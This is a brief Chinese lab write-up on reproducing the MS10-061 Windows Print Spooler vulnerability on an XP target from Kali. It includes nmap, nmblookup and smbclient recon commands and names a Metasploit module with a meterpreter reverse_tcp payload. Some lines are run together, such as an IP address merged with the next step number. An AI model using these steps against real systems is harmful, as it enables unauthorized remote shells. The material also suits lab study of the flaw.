目录
讲在前面
实验环境
实验步骤
一、开启WinXP上打印机共享服务
二、kali攻击
此漏洞中文称为:打印后台程序服务模拟漏洞。目前所有的研究文章总结的漏洞成因为:Windows打印后台程序没有充分的限制访问该服务的问题,攻击者可以对其发起恶意请求间接的在Windows系统目录(%SystemRoot%\System32)中创建文件。该漏洞首次被发现并被利用于著名的Stuxnet蠕虫(俗称“震网”)
打开控制面板,找到“打印机和传真”,双击打开后,右键选择“添加打印机”。如下地方的配置请注意
1、nmap扫描靶机是否正常开启NetBios和RPC服务
nmap -sS -sU -O -p137-139,445, 192.168.1.1222、查看netbios名称
nmblookup -A 192.168.1.1223、查看共享SMB共享资源
smbclient -L \\NetBIOS工作站名字 -I 靶机IP -N 或者在主机上执行net share命令设置参数并攻击
exploit/windows/smb/ms10_061_spoolss Payload:windows/meterpreter/reverse_tcp笔者这里并未验证成功,并且在win7上也未能利用成功该漏洞,按照微软官方预警,是影响XP\2003\2008\win7的
影响范围
目前未看到有国内研究员的详细研究文章,此处贴出本文借鉴的实验文章
ms10-061复现
